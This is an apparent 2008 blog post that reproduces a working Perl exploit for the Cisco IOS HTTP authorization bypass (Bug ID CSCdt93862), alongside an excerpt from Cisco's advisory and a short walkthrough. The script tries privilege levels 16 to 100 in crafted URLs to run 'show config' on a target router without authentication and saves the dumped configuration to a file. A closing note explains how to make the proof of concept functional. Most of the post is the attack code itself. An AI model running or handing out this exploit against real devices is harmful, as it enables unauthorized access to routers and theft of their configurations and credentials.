Monday, February 18, 2008

Brute force IOS HTTP authorization vulnerability

Brute force IOS HTTP authorization vulnerability
#!/usr/bin/perl

#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#

use LWP;
use IO::Handle;

my $host = shift;

print "$host: ";
flush STDOUT;

my $agent = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

if ($response->is_success || $response->code != 401) {
if ($response->header('Server') ne '') {
print $response->header('Server');
print "\n";
}
else {
print "unexpected response, may not be a Cisco.\n";
}
exit;
}
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
if ($response->is_success) {
open(HOST, ">$host") || die ("Can't open file $host\n");
print HOST $response->content;
close(HOST);
print "exploited.\n";
exit;
}
else {
if ($response->code != 401) {
print "unexpected response, may not be a Cisco.\n";
exit;
}
}
}

print "failed.\n";

____________
Credits:
r45c4l

The code is downloaded from here

http://www.phreedom.org/solar/code/ios-http-auth/ios-http-auth.pl

and credits goes to phreedom crew.

First have a look here:

http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml

----Excerpts---
By sending a crafted URL it is possible to bypass authentication and execute any command on the router at level 15 (enable level, the most privileged level). This will happen only if the user is using a local database for authentication (usernames and passwords are defined on the device itself). The same URL will not be effective against every Cisco IOS software release and hardware combination. However, there are only 84 different combinations to try, so it would be easy for an attacker to test them all in a short period of time.

The URL in question follows this format:

http:///level/xx/exec/....

Where xx is a number between 16 and 99.

This vulnerability is documented as Cisco Bug ID CSCdt93862.
-----------------

As you see this is one of the easiest exploit. The main part of the code is

--code--
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
--------

what the program does is to replace variable $host with devicename and $level varies from 16 to 99 in the for loop, the program requests for the page /show/config and if the page is returned successfully the response is logged else returns for next level [ because if incorrect request is made the server will return errors like 200/401 etc.]

-----[Revision]----
my $host = shift;
Its POC so the original author left it but to make it functional you must replace 'shift' with an IP addr of the cisco device.